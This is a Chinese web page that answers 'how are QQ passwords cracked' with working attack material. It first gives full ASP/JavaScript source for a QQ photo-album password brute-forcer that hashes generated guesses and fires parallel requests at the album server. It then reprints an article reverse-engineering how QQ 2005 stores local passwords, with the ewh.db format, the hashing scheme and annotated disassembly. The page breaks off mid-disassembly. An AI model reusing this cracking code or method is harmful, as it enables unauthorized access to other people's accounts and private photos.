*** 密码是如何被破译的？谁有源代码？

黑客：专业软件 黑客有；

白客：暴力破解（慢慢一个一个试 直到试出来）网上有 搜索 *** 暴力破解

跪求一个破解 *** 像册的办法.

html

head

title忘qq相册密码(又忘 qq密码了),请用本qq相册密码暴破器(第二版) /title

script

//document.write (MD5("58"))

function MD5(sMessage)

{

function RotateLeft(lValue, iShiftBits)

{

return (lValueiShiftBits) | (lValue(32-iShiftBits));

}

function AddUnsigned(lX,lY)

{

var lX4,lY4,lX8,lY8,lResult;

lX8 = (lX 0x80000000);

lY8 = (lY 0x80000000);

lX4 = (lX 0x40000000);

lY4 = (lY 0x40000000);

lResult = (lX 0x3FFFFFFF)+(lY 0x3FFFFFFF);

if (lX4 lY4) return (lResult ^ 0x80000000 ^ lX8 ^ lY8);

if (lX4 | lY4) {

if (lResult 0x40000000) return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);

else return (lResult ^ 0x40000000 ^ lX8 ^ lY8);

} else return (lResult ^ lX8 ^ lY8);

}

function F(x,y,z) { return (x y) | ((~x) z); }

function G(x,y,z) { return (x z) | (y (~z)); }

function H(x,y,z) { return (x ^ y ^ z); }

function I(x,y,z) { return (y ^ (x | (~z))); }

function FF(a,b,c,d,x,s,ac) {

a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));

return AddUnsigned(RotateLeft(a, s), b);

}

function GG(a,b,c,d,x,s,ac) {

a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));

return AddUnsigned(RotateLeft(a, s), b);

}

function HH(a,b,c,d,x,s,ac) {

a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));

return AddUnsigned(RotateLeft(a, s), b);

}

function II(a,b,c,d,x,s,ac) {

a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));

return AddUnsigned(RotateLeft(a, s), b);

}

function ConvertToWordArray(sMessage) {

var lWordCount;

var lMessageLength = sMessage.length;

var lNumberOfWords_temp1=lMessageLength + 8;

var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;

var lNumberOfWords = (lNumberOfWords_temp2+1)*16;

var lWordArray=Array(lNumberOfWords-1);

var lBytePosition = 0;

var lByteCount = 0;

while ( lByteCount lMessageLength ) {

lWordCount = (lByteCount-(lByteCount % 4))/4;

lBytePosition = (lByteCount % 4)*8;

lWordArray[lWordCount] = (lWordArray[lWordCount] | (sMessage.charCodeAt(lByteCount)lBytePosition));

lByteCount++;

}

lWordCount = (lByteCount-(lByteCount % 4))/4;

lBytePosition = (lByteCount % 4)*8;

lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80lBytePosition);

lWordArray[lNumberOfWords-2] = lMessageLength3;

lWordArray[lNumberOfWords-1] = lMessageLength29;

return lWordArray;

}

function WordToHex(lValue) {

var WordToHexValue="",WordToHexValue_temp="",lByte,lCount;

for (lCount = 0;lCount=3;lCount++) {

lByte = (lValue(lCount*8)) 255;

WordToHexValue_temp = "0" + lByte.toString(16);

WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2);

}

return WordToHexValue;

}

var x=Array();

var k,AA,BB,CC,DD,a,b,c,d

var S11=7, S12=12, S13=17, S14=22;

var S21=5, S22=9 , S23=14, S24=20;

var S31=4, S32=11, S33=16, S34=23;

var S41=6, S42=10, S43=15, S44=21;

// Steps 1 and 2. Append padding bits and length and convert to words

x = ConvertToWordArray(sMessage);

// Step 3. Initialise

a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;

// Step 4. Process the message in 16-word blocks

for (k=0;kx.length;k+=16) {

AA=a; BB=b; CC=c; DD=d;

a=FF(a,b,c,d,x[k+0], S11,0xD76AA478);

d=FF(d,a,b,c,x[k+1], S12,0xE8C7B756);

c=FF(c,d,a,b,x[k+2], S13,0x242070DB);

b=FF(b,c,d,a,x[k+3], S14,0xC1BDCEEE);

a=FF(a,b,c,d,x[k+4], S11,0xF57C0FAF);

d=FF(d,a,b,c,x[k+5], S12,0x4787C62A);

c=FF(c,d,a,b,x[k+6], S13,0xA8304613);

b=FF(b,c,d,a,x[k+7], S14,0xFD469501);

a=FF(a,b,c,d,x[k+8], S11,0x698098D8);

d=FF(d,a,b,c,x[k+9], S12,0x8B44F7AF);

c=FF(c,d,a,b,x[k+10],S13,0xFFFF5BB1);

b=FF(b,c,d,a,x[k+11],S14,0x895CD7BE);

a=FF(a,b,c,d,x[k+12],S11,0x6B901122);

d=FF(d,a,b,c,x[k+13],S12,0xFD987193);

c=FF(c,d,a,b,x[k+14],S13,0xA679438E);

b=FF(b,c,d,a,x[k+15],S14,0x49B40821);

a=GG(a,b,c,d,x[k+1], S21,0xF61E2562);

d=GG(d,a,b,c,x[k+6], S22,0xC040B340);

c=GG(c,d,a,b,x[k+11],S23,0x265E5A51);

b=GG(b,c,d,a,x[k+0], S24,0xE9B6C7AA);

a=GG(a,b,c,d,x[k+5], S21,0xD62F105D);

d=GG(d,a,b,c,x[k+10],S22,0x2441453);

c=GG(c,d,a,b,x[k+15],S23,0xD8A1E681);

b=GG(b,c,d,a,x[k+4], S24,0xE7D3FBC8);

a=GG(a,b,c,d,x[k+9], S21,0x21E1CDE6);

d=GG(d,a,b,c,x[k+14],S22,0xC33707D6);

c=GG(c,d,a,b,x[k+3], S23,0xF4D50D87);

b=GG(b,c,d,a,x[k+8], S24,0x455A14ED);

a=GG(a,b,c,d,x[k+13],S21,0xA9E3E905);

d=GG(d,a,b,c,x[k+2], S22,0xFCEFA3F8);

c=GG(c,d,a,b,x[k+7], S23,0x676F02D9);

b=GG(b,c,d,a,x[k+12],S24,0x8D2A4C8A);

a=HH(a,b,c,d,x[k+5], S31,0xFFFA3942);

d=HH(d,a,b,c,x[k+8], S32,0x8771F681);

c=HH(c,d,a,b,x[k+11],S33,0x6D9D6122);

b=HH(b,c,d,a,x[k+14],S34,0xFDE5380C);

a=HH(a,b,c,d,x[k+1], S31,0xA4BEEA44);

d=HH(d,a,b,c,x[k+4], S32,0x4BDECFA9);

c=HH(c,d,a,b,x[k+7], S33,0xF6BB4B60);

b=HH(b,c,d,a,x[k+10],S34,0xBEBFBC70);

a=HH(a,b,c,d,x[k+13],S31,0x289B7EC6);

d=HH(d,a,b,c,x[k+0], S32,0xEAA127FA);

c=HH(c,d,a,b,x[k+3], S33,0xD4EF3085);

b=HH(b,c,d,a,x[k+6], S34,0x4881D05);

a=HH(a,b,c,d,x[k+9], S31,0xD9D4D039);

d=HH(d,a,b,c,x[k+12],S32,0xE6DB99E5);

c=HH(c,d,a,b,x[k+15],S33,0x1FA27CF8);

b=HH(b,c,d,a,x[k+2], S34,0xC4AC5665);

a=II(a,b,c,d,x[k+0], S41,0xF4292244);

d=II(d,a,b,c,x[k+7], S42,0x432AFF97);

c=II(c,d,a,b,x[k+14],S43,0xAB9423A7);

b=II(b,c,d,a,x[k+5], S44,0xFC93A039);

a=II(a,b,c,d,x[k+12],S41,0x655B59C3);

d=II(d,a,b,c,x[k+3], S42,0x8F0CCC92);

c=II(c,d,a,b,x[k+10],S43,0xFFEFF47D);

b=II(b,c,d,a,x[k+1], S44,0x85845DD1);

a=II(a,b,c,d,x[k+8], S41,0x6FA87E4F);

d=II(d,a,b,c,x[k+15],S42,0xFE2CE6E0);

c=II(c,d,a,b,x[k+6], S43,0xA3014314);

b=II(b,c,d,a,x[k+13],S44,0x4E0811A1);

a=II(a,b,c,d,x[k+4], S41,0xF7537E82);

d=II(d,a,b,c,x[k+11],S42,0xBD3AF235);

c=II(c,d,a,b,x[k+2], S43,0x2AD7D2BB);

b=II(b,c,d,a,x[k+9], S44,0xEB86D391);

a=AddUnsigned(a,AA); b=AddUnsigned(b,BB); c=AddUnsigned(c,CC); d=AddUnsigned(d,DD);

}

// Step 5. Output the 128 bit digest

var temp= WordToHex(a)+WordToHex(b)+WordToHex(c)+WordToHex(d);

return temp.toLowerCase();

}

/script

/head

body

%

start_wei_shuo=1

end_wei_shuo=12

'密码字典

'大写一般没人用 ch="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@!~^#%$"

ch=split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")

ch2=split("0,1,2,3,4,5,6,7,8,9",",")

ch3=split("a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")

'--------------------------------------------------

if request("fun")="" then

%

scriptalert("忘qq相册密码(又忘 qq密码了),请用本qq相册密码暴破器(第二版,警告：不得用于非法目的");

alert("在深夜破更快");

setTimeout("self.location='gogirl.asp?fun=test';",10);/script

%

response.end

end if

'----------------------------------------------

sub next_char_index()

aaa=0

for i=1 to session("pwd_now_len")

if session(cstr(i)"wei_now_char_index")=(session(cstr(i)"wei_max_index")-1) then

session(cstr(i)"wei_now_char_index")=0

if i=cint(session("pwd_now_len")) then

if i=cint(session("pwd_max_len")) then

session("ok_break")=1

session("pwd_now_len")=session("pwd_min_len")

for iiu=1 to 90

session(cstr(iiu)"wei_now_char_index")=0

next

exit for

end if

session("pwd_now_len")=session("pwd_now_len")+1

session(cstr(session("pwd_now_len"))"wei_now_char_index")=0

exit for

else

aaa=1

end if

else

session(cstr(i)"wei_now_char_index")=session(cstr(i)"wei_now_char_index")+1

exit for

end if

if aaa=0 then exit for

if aaa=1 then aaa=0

next

end sub

'----------------------------------------------

function get_now_pwd()

s=""

for ia=session("pwd_now_len") to 1 step -1

if session(cstr(ia)"wei_type")="numandstr" then

a=ch(session(cstr(ia)"wei_now_char_index"))

s=sa

end if

if session(cstr(ia)"wei_type")="num" then

a=ch2(session(cstr(ia)"wei_now_char_index"))

s=sa

end if

if session(cstr(ia)"wei_type")="str" then

a=ch3(session(cstr(ia)"wei_now_char_index"))

s=sa

end if

next

get_now_pwd=s

exit function

end function

'----------------------------------------------

'main_code---start:

xml_thread_max=10

if session("haved")"" then

for w=1 to xml_thread_max

Execute("Set http"cstr(w)"=Server.CreateObject(""Microsoft.XMLHTTP"")")

Execute("http" cstr(w) ".Open ""GET""," " """ session("qq") "albumid=" session("ceid") "password=" request("md"cstr(w))" "" " ",False")

Execute("http" cstr(w) ".send")

Execute("Set Doc" cstr(w) "=Server.CreateObject(""Microsoft.XMLDOM"") ")

Execute("Doc" cstr(w) ".Async=False ")

Execute("Doc" cstr(w) ".ValidateOnParse=False")

Execute("Doc" cstr(w) ".Load(http" cstr(w) ".ResponseXML)")

Execute("set root" cstr(w) "=Doc" cstr(w) ".documentElement")

Execute("set nodelis" cstr(w) "=root" cstr(w) ".selectnodes(""msg"")")

Execute("nodecount" cstr(w) "=nodelis" cstr(w) ".length")

next

for ww=1 to xml_thread_max

if eval("nodecount" cstr(ww) "=0") then

response.write "script language=javascriptalert('破解成功,密码为:"request("mima"cstr(ww))"');/script"

response.end

end if

next

if session("ok_break")=1 then

response.write "script language=javascriptalert('扫描完成，未发现正确的密码');/script"

response.end

end if

end if

session("haved")="1"

%

script language=javascript

md1=MD5("%=get_now_pwd()%");

mima1="%=get_now_pwd()%"

%call next_char_index%

md2=MD5("%=get_now_pwd()%");

mima2="%=get_now_pwd()%"

%call next_char_index%

md3=MD5("%=get_now_pwd()%");

mima3="%=get_now_pwd()%"

%call next_char_index%

md4=MD5("%=get_now_pwd()%");

mima4="%=get_now_pwd()%"

%call next_char_index%

md5=MD5("%=get_now_pwd()%");

mima5="%=get_now_pwd()%"

%call next_char_index%

md6=MD5("%=get_now_pwd()%");

mima6="%=get_now_pwd()%"

%call next_char_index%

md7=MD5("%=get_now_pwd()%");

mima7="%=get_now_pwd()%"

%call next_char_index%

md8=MD5("%=get_now_pwd()%");

mima8="%=get_now_pwd()%"

%call next_char_index%

md9=MD5("%=get_now_pwd()%");

mima9="%=get_now_pwd()%"

%call next_char_index%

md10=MD5("%=get_now_pwd()%");

mima10="%=get_now_pwd()%"

%call next_char_index%

setTimeout("self.location='gogirl.asp?fun=testwhy=忘qq相册密码(又忘qq密码了),请用本qq相册密码暴破器(第二版)BYqq78780577md1='+md1+'md2='+md2+'md3='+md3+'md4='+md4+'md5='+md5+'md6='+md6+'md7='+md7+'md8='+md8+'md9='+md9+'md10='+md10+'mima1='+mima1+'mima2='+mima2+'mima3='+mima3+'mima4='+mima4+'mima5='+mima5+'mima6='+mima6+'mima7='+mima7+'mima8='+mima8+'mima9='+mima9+'mima10='+mima10;",1);

/script

%

for io=1 to 5

response.write "font color=red正在尝试密码:"request("mima"cstr(io))" ------对应md5:"request("md"cstr(io))"/fontbr"

next

response.write "brbrbr正在破的qq为"session("qq")"br正在破的qq相册的id为"session("ceid")

response.write "br线程数:"

response.write xml_thread_max

response.write "brbr说明:忘qq相册密码(又忘qq密码了),请用本qq相册密码暴破器(第二版)"

response.write "brHACKER"

response.write "bra href=index.asp返回并重新选其他破解方式/font"

%

以上是暴力破解 *** 相册的ASP程序源码。自己研究一下吧，破解MD5的。

*** 密码加密原理???

*** 2005 贺岁版登录口令加密算法及其源代码 Binny（Binny@vip.163.com） 2005-12-11 3:27:33 查看: 次 星级: 文字大小: 较大 正常 较小 收藏此页到365Key 收藏此页到新浪ViVi 【导读】拿到 *** 2005贺岁版后，发现其加密原理并没有新的改变，经过跟踪和分析，编制出暴力破解本地 *** 密码的程序。 *** 密码在正确登陆后，会将加密的结果保存在用户目录的ewh.db文件中，加密采用公开的MD5算法，通过N次循环以及异或后求反，最终计算出加密的结果，与用户的ewh.db文件中的密文比较后，发出“输入密码与上次成功登录的密码不一致,$0A是否到服务器验证?”（这条信息在BasicCtrlDll.dll的资源中，$0A在C的格式化中为回车）。根据这个提示，完成本地 *** 密码的暴力破解。 拿到 *** 2005贺岁版后，发现其加密原理并没有新的改变，经过跟踪和分析，编制出暴力破解本地 *** 密码的程序。

*** 密码在正确登陆后，会将加密的结果保存在用户目录的ewh.db文件中，加密采用公开的MD5算法，通过N次循环以及异或后求反，最终计算出加密的结果，与用户的ewh.db文件中的密文比较后，发出“输入密码与上次成功登录的密码不一致,$0A是否到服务器验证?”（这条信息在BasicCtrlDll.dll的资源中，$0A在C的格式化中为回车）。根据这个提示，完成本地 *** 密码的暴力破解。

在 *** 系统中，“QD”标志代表 *** Data，例如，我们可以在文件User.db或ewh.db中找到这个以QD开头的数据结构。

一、 ewh.db原始数据

51 44 01 01 03 00 04 03 00 BD AF A8 04 00 00 00

00 2E 06 00 07 03 00 B9 AB B4 10 00 00 00 07 22

AA 96 56 19 A3 9E 82 19 B7 2B BD 2D 34 4A 04 03

00 A9 B5 B2 04 00 00 00 3C A8 93 06

其中，红色为AST循环次数，兰色为EWH加密字符串，绿色为UIN *** 号（110340156=0x0693A83C，Intel体系内存中排列顺序为：3CA89306）。

二、 ewh.db数据结构

HEX

偏移 DEC

偏移 数据 注释 变量

标志

0000 1 51 44 QD， *** Data 数据标志 Flag

0002 3 01 01 保留的数据结构 Reserve

0004 5 03 00 总数据段（Data Sections）的个数 Sections

0006 7 04 之一个数据段（简称1S，下同）的类型，可以从0x01到0x0F，04代表本数据没经过加密处理。 Type1S

0007 8 03 00 1S标志的长度。 LenFlag1S

0009 10 BD AF A8 1S标志（例如AST、UIN、EWH等），是经过简单的异或并求反计算处理的，此处是AST，可能是Algorithm Shift Times 或Axxx Switch Time，管他的呢！ Flag1S

000C 13 04 00 00 00 1S数据的长度 LenData1S

0010 17 00 2E 06 00

= (404992) 1S数据，这里是进行MD5转换的次数。

这个数据是同计算机的性能有关的，性能越高的计算机，在 *** 注册成功后产生的这个循环控制变量就越大。 Data1S

0014 21 07 2S数据的类型，07代表使用MD5进行加密 Type2S

0015 22 03 00 2S标志的长度 LenFlag2S

0017 24 B9 AB B4 2S标志，此处是EWH，代表本数据段是EWH密码数据，可能是Encrypt With Hash的缩写 Flag2S

001A 27 10 00 00 00 2S数据的长度 LenData2S

001E 31 07 22 AA 96

56 19 A3 9E

82 19 B7 2B

BD 2D 34 4A 2S数据，是经过MD5加密计算后产生的数据，当然还要经过异或并求反的计算处理，参考下面程序中的1000B858 行代码。 Data2S

002E 47 04 3S数据的类型 Type3S

002F 48 03 00 3S标志的长度 LenFlag3S

0031 50 A9 B5 B2 3S标志，此处是UIN，代表本数据段是 *** 号码，可能是：User Identifier Number的缩写 Flag3S

0034 53 04 00 00 00 3S数据的长度 LenData3S

0038 57 3C A8 93 06 3S数据，3C A8 93 06 = 110340156 Data3S

三、 加密原理

下面VB伪代码的部分符号引自以上第二点《结构说明》中的变量标志，请注意理解：

Pwd = MD5(Pwd, Len(Pwd)) ' Pwd为用户输入的密码，之一轮MD5后，Pwd成为16位字节长度的MD5串。

XorKey As Long = 0 'XorKey为用于解密的字节

For k = 1 To Data1S – 1 '因为前面已经做过一轮，所以此处要减一

Pwd = MD5(Pwd, 16)

Next k

XorKey = XorKey And HFFFF

XorKey = (LenData2S And HFF) Xor (LenData2S \ 256)

XorKey = HFF - XorKey '求反

For k = 1 To 16

Pwd(k) = Pwd(k) Xor XorKey

Next k

If Pwd Data2S Then

MsgBox "输入密码与上次成功登录的密码不一致," vbcrlf "是否到服务器验证?"

End If

通过以上的流程，我真的佩服 *** 的设计者，如此巨大的循环量，加上循环次数的随机性，如果希望产生一个 *** MD5词典简直不可能。虽然理论上，可以产生一个MD5字典，但是，这个字典将有1.15E+77*16个字节之巨，因此，只好根据ewh.db文件提供的数据暴力破解了，不知是不是有更好的 *** 呢？

不过我的感觉是，循环次数加多了，应该会产生更多的MD5碰撞，不见得是个好事。

还有一种破解思路，也许更加直接，将在后面的文章中详细探讨。但是我只有在有时间做完实验后才有资格评述，不在本文章的讨论范围内。

四、 破解算法

重复进行数十万次MD5加密，会消耗计算机很多时间，如果使用传统的VB或VC，对于一个密码的等待时间也是很可观的（例如使用VB代码，消耗的时间可能是汇编的400倍），因此，我使用汇编语言来编制低层加密解密算法，通过MA *** 32编译连接，最后用高级语言调用。通过提供算法动态库的方式，方便其他有兴趣的读者自己增加丰富的功能。例如增加多线程等，这也将在以后的探讨中实现。在此不做深入讨论。

附带的例子为VB和VC调用汇编语言动态库的例子，VB代码简单实现了通过密码字典进行单线程破解的功能，读者可以丰富其内容。增加更多的功能。

五、 *** 数据结构分析

下面为动态库BasicCtrlDll.dll中反汇编的代码以及代码分析，主要用于分析EWH.DB中数据结构以及 *** 数据解调算法的问题。另外，这个算法也可以将User.db中的数据提取出来。深入研究下去，做一个聊天记录查看器之类的软件也非难事。

1000B71D B8 AC160110 mov eax,BasicCtr.100116AC

1000B722 E8 89460000 call BasicCtr.1000FDB0

1000B727 83EC 3C sub esp,3C

1000B72A 8B45 08 mov eax,dword ptr ss:[ebp+8] 将数据的开始地址赋给EAX，实际数据为**Data，EAX=*Data

1000B72D 53 push ebx

1000B72E 56 push esi

1000B72F 57 push edi

1000B730 8B30 mov esi,dword ptr ds:[eax] 需要转换的字符串，EAX指示一个结构，之一个成员为实际的数据指针

1000B732 894D D8 mov dword ptr ss:[ebp-28],ecx 局部变量[ebp-28]保存全局的标志结构，ECX为全局参数地址，在调用本函数时跟入

1000B735 8B46 F8 mov eax,dword ptr ds:[esi-8] 为CString结构中长度的成员，表示总共多少个字节

1000B738 83F8 06 cmp eax,6 如果长度小于6，则为无效的数据

1000B73B 0F82 81020000 jb BasicCtr.1000B9C2 如果比6小则跳转退出，说明数据量不够解调的

1000B741 803E 51 cmp byte ptr ds:[esi],51 是否为 *** Data 的数据，QD为 *** 数据标志

1000B744 0F85 78020000 jnz BasicCtr.1000B9C2

1000B74A 807E 01 44 cmp byte ptr ds:[esi+1],44

1000B74E 0F85 6E020000 jnz BasicCtr.1000B9C2

1000B754 66:8B7E 04 mov di,word ptr ds:[esi+4] 对于EWH来说，为第4+1个字节，为0003

1000B758 83C6 04 add esi,4 指向数据段(Sections)的个数

1000B75B 46 inc esi

1000B75C 83C0 FA add eax,-6 EAX去掉6个字节，对于EWH来说，剩下36H个字节

1000B75F 46 inc esi

1000B760 8945 08 mov dword ptr ss:[ebp+8],eax 指向之一个数据段

1000B763 E8 CE050000 call BasicCtr.1000BD36 在内存（ECX+9C）处开辟一个(100H)字节的空间，空间地址返回到EAX

1000B768 8365 E0 00 and dword ptr ss:[ebp-20],0 局部变量[ebp-20]清零

1000B76C 0FB7C7 movzx eax,di 转换到EAX，对于EWH，di=3。表示有3段数据

1000B76F 85C0 test eax,eax

1000B771 8945 B8 mov dword ptr ss:[ebp-48],eax 局部变量[ebp-48]保存数据的段数

1000B774 0F8E 21020000 jle BasicCtr.1000B99B

1000B77A 837D 08 07 cmp dword ptr ss:[ebp+8],7 如果整个长度小于7，则剩下的应该是 *** 号了。之一次进入时=36H

1000B77E 0F82 3E020000 jb BasicCtr.1000B9C2 如果剩余的数据长度小于7则退出

1000B784 8A06 mov al,byte ptr ds:[esi] 之一次进入时，ESI指向第7个数据即数据段的类型，例如 04

1000B786 66:8B4E 01 mov cx,word ptr ds:[esi+1] CX=后一个数据，及数据段标志的长度，例如 0003

1000B78A 46 inc esi

1000B78B 8B55 08 mov edx,dword ptr ss:[ebp+8] 剩余的数据长度，如36H

1000B78E 836D 08 03 sub dword ptr ss:[ebp+8],3 去掉3个，例如成为33H=51

1000B792 894D C8 mov dword ptr ss:[ebp-38],ecx 局部变量[ebp-38]保存数据段中标志长度

1000B795 0FB7F9 movzx edi,cx EDI为标志长度了

1000B798 46 inc esi

1000B799 8845 E4 mov byte ptr ss:[ebp-1C],al 局部变量[ebp-1C]保存本段的类型

1000B79C 8D4F 04 lea ecx,dword ptr ds:[edi+4] ECX为取得的标志长度再加上4，例如=7

1000B79F 46 inc esi 之一次时，ESI指向之一个数据段的标志字段了，例如指向BDAFA8，第9个数据开始

1000B7A0 394D 08 cmp dword ptr ss:[ebp+8],ecx 如果剩余的数据比“标志长度+4”还少，则没有数据，因此不进行处理

1000B7A3 0F82 19020000 jb BasicCtr.1000B9C2

1000B7A9 8B0C37 mov ecx,dword ptr ds:[edi+esi] 跳过数据段的标志部分，将数据段的长度赋值给ECX。例如[edi+esi]=4

1000B7AC 8D1C37 lea ebx,dword ptr ds:[edi+esi] EBX保存新的指针，指向数据段中数据部分的长度部分，例如，[EBX]=4

1000B7AF 895D C4 mov dword ptr ss:[ebp-3C],ebx 局部变量[ebp-3C]保存数据段中数据部分的长度指针

1000B7B2 8D4C0F 07 lea ecx,dword ptr ds:[edi+ecx+7] 从标志（自身长3，加上4个长度位=7）开始，加上数据长度，为完整数据长度。例如E

1000B7B6 3BCA cmp ecx,edx 如果剩下的数据长度（如36H）不够，则退出

1000B7B8 894D CC mov dword ptr ss:[ebp-34],ecx 局部变量[ebp-34]保存本数据段的总长度

1000B7BB 0F87 01020000 ja BasicCtr.1000B9C2 如果小于则退出程序

1000B7C1 8365 F0 00 and dword ptr ss:[ebp-10],0 局部变量[ebp-10]清零

1000B7C5 3C 01 cmp al,1 al保存本段的类型，有效的类型是4或7

1000B7C7 74 18 je short BasicCtr.1000B7E1

1000B7C9 3C 02 cmp al,2

1000B7CB 74 14 je short BasicCtr.1000B7E1

1000B7CD 3C 03 cmp al,3

1000B7CF 74 10 je short BasicCtr.1000B7E1

1000B7D1 3C 04 cmp al,4

1000B7D3 74 0C je short BasicCtr.1000B7E1

1000B7D5 3C 05 cmp al,5

1000B7D7 74 08 je short BasicCtr.1000B7E1

1000B7D9 3C 07 cmp al,7

1000B7DB 74 04 je short BasicCtr.1000B7E1

1000B7DD 3C 06 cmp al,6

1000B7DF 75 19 jnz short BasicCtr.1000B7FA

1000B7E1 51 push ecx 为本段的总长度，包括（段类型+标志长度+标志+数据长度+数据），例如，对于密码段=1AH

1000B7E2 E8 23430000 call MFC42.operator new

1000B7E7 FF75 CC push dword ptr ss:[ebp-34] n=[ebp-34]，局部变量[ebp-34]保存本数据段的总长度

1000B7EA 8D4E FD lea ecx,dword ptr ds:[esi-3] [esi-3]指向本段的开始（从段类型算起）

1000B7ED 8945 F0 mov dword ptr ss:[ebp-10],eax 局部变量[ebp-10]保存拷贝后的数据

1000B7F0 51 push ecx src

1000B7F1 50 push eax dest

1000B7F2 E8 E5450000 call MSVCRT.memcpy memcpy，将本段的整段数据拷贝到新的地方，数据指针保存在局部变量[ebp-10]中

1000B7F7 83C4 10 add esp,10

1000B7FA 8B45 C8 mov eax,dword ptr ss:[ebp-38] 局部变量[ebp-38]保存数据段中标志长度

1000B7FD 33C9 xor ecx,ecx

1000B7FF 32C4 xor al,ah 将低位长度与高位异或，例如3 xor 0=3

1000B801 85FF test edi,edi EDI为标志位的长度

1000B803 76 12 jbe short BasicCtr.1000B817 如果本段没有段标志，则跳转

1000B805 8A1431 mov dl,byte ptr ds:[ecx+esi] 开始循环，循环次数为标志的长度。 ECX之一次时为0，将之一个数据加载到DL中。

1000B808 32D0 xor dl,al AL为长度的高位和低位的异或，这里为3

1000B80A F6D2 not dl DL=NOT ([数据] xor [数据段标志长度的高位 xor 数据段标志长度的低位])

1000B80C 881431 mov byte ptr ds:[ecx+esi],dl 数据保存在原始的内存中相应的地方

1000B80F 41 inc ecx

1000B810 3BCF cmp ecx,edi

1000B812 72 F1 jb short BasicCtr.1000B805

1000B814 8B5D C4 mov ebx,dword ptr ss:[ebp-3C] 局部变量[ebp-3C]保存数据段中数据部分的长度指针

1000B817 57 push edi EDI为标志位的长度

1000B818 56 push esi ESI为指向解密以后的数据，例如AST

1000B819 8D4D E8 lea ecx,dword ptr ss:[ebp-18] 局部变量[ebp-18]存放强制类型转换以后的数据指针的指针，例如AST

1000B81C E8 5B430000 call MFC42.CString::CString 将解密后的数据变成CString类型。返回的类型放在EAX指示的地址中

1000B821 8365 FC 00 and dword ptr ss:[ebp-4],0 局部变量[ebp-4]清零

1000B825 6A FC push -4

1000B827 58 pop eax EAX=-4=FFFFFFFC

1000B828 8BF3 mov esi,ebx ebx保存数据段中数据部分的长度指针

1000B82A 2BC7 sub eax,edi EAX=EAX-EDI=FFFFFFFC-3=FFFFFFF9

1000B82C 8B1E mov ebx,dword ptr ds:[esi] ebx为数据段中数据部分的长度了

1000B82E 0145 08 add dword ptr ss:[ebp+8],eax 之一次时，[EBP+8]=33。执行后=2C，相当于33H-7H=2CH

1000B831 83C6 04 add esi,4 ESI指向数据段中的数据部分了

1000B834 395D 08 cmp dword ptr ss:[ebp+8],ebx [ebp+8]=2C，ebx=4

1000B837 0F82 6A010000 jb BasicCtr.1000B9A7

1000B83D 807D E4 07 cmp byte ptr ss:[ebp-1C],7 局部变量[ebp-1C]保存本段的类型， 4或者7

1000B841 74 06 je short BasicCtr.1000B849

1000B843 807D E4 06 cmp byte ptr ss:[ebp-1C],6 如果类型不为6，则执行1000B862

1000B847 75 19 jnz short BasicCtr.1000B862

1000B849 8AC3 mov al,bl 如果数据段的类型为7，则执行此语句。BL包含本段的长度

1000B84B 33FF xor edi,edi

1000B84D 32C7 xor al,bh al=（长度的低位 xor 长度的高位）

1000B84F 85DB test ebx,ebx

1000B851 76 0F jbe short BasicCtr.1000B862 如果长度为0，则表示没有密码

1000B853 8A0C37 mov cl,byte ptr ds:[edi+esi]

1000B856 32C8 xor cl,al

1000B858 F6D1 not cl DL=NOT ([数据] xor [数据段标志长度的高位xor 数据段标志长度的低位])

1000B85A 880C37 mov byte ptr ds:[edi+esi],cl

1000B85D 47 inc edi

1000B85E 3BFB cmp edi,ebx

1000B860 72 F1 jb short BasicCtr.1000B853 循环直到全部数据解调完毕

1000B862 53 push ebx 数据串的长度

1000B863 56 push esi 原始的需要变换的数据

1000B864 8D4D EC lea ecx,dword ptr ss:[ebp-14] 局部变量[ebp-14]存放强制CString类型转换以后的数据指针的指针，例如DB2E0600

1000B867 E8 10430000 call MFC42.CString::CString

1000B86C 8A45 E4 mov al,byte ptr ss:[ebp-1C] 局部变量[ebp-1C]保存本段的类型，4或者7

1000B86F 295D 08 sub dword ptr ss:[ebp+8],ebx 去掉已经处理的数据，执行后 [ebp+8]=28H，ebx为数据段中数据部分的长度

1000B872 03F3 add esi,ebx ESI指向下一个数据段的开始部分，ebx保存数据段中数据部分的长度指针

1000B874 33FF xor edi,edi

1000B876 84C0 test al,al 测试本段的类型是否为0

1000B878 C645 FC 01 mov byte ptr ss:[ebp-4],1 局部布尔型变量[ebp-4]=1

1000B87C 0F86 A3010000 jbe BasicCtr.1000BA25 如果本段的数据类型为0，则执行 1000BA25后退出

1000B882 3C 07 cmp al,7

1000B884 0F86 B6000000 jbe BasicCtr.1000B940 如果小于等于7，则跳转到1000B940执行。对于EWH来说就是这样

1000B88A 3C 08 cmp al,8

1000B88C 0F84 74010000 je BasicCtr.1000BA06 如果数据类型为8，则直接退出。

1000B892 3C 09 cmp al,9

1000B894 74 5D je short BasicCtr.1000B8F3

1000B896 3C 0A cmp al,0A

1000B898 0F85 87010000 jnz BasicCtr.1000BA25

1000B89E 8B4D D8 mov ecx,dword ptr ss:[ebp-28] 当数据类型为A时，执行本程序代码

1000B8A1 8D45 D4 lea eax,dword ptr ss:[ebp-2C]

1000B8A4 50 push eax

1000B8A5 E8 47FEFFFF call BasicCtr.1000B6F1

1000B8AA 8B45 D4 mov eax,dword ptr ss:[ebp-2C]

1000B8AD FF75 EC push dword ptr ss:[ebp-14]

1000B8B0 8B08 mov ecx,dword ptr ds:[eax]

1000B8B2 53 push ebx

1000B8B3 50 push eax

1000B8B4 FF91 BC000000 call dword ptr ds:[ecx+BC]

1000B8BA 8BD8 mov ebx,eax

1000B8BC 85DB test ebx,ebx

1000B8BE 0F85 12010000 jnz BasicCtr.1000B9D6

1000B8C4 8B45 D4 mov eax,dword ptr ss:[ebp-2C]

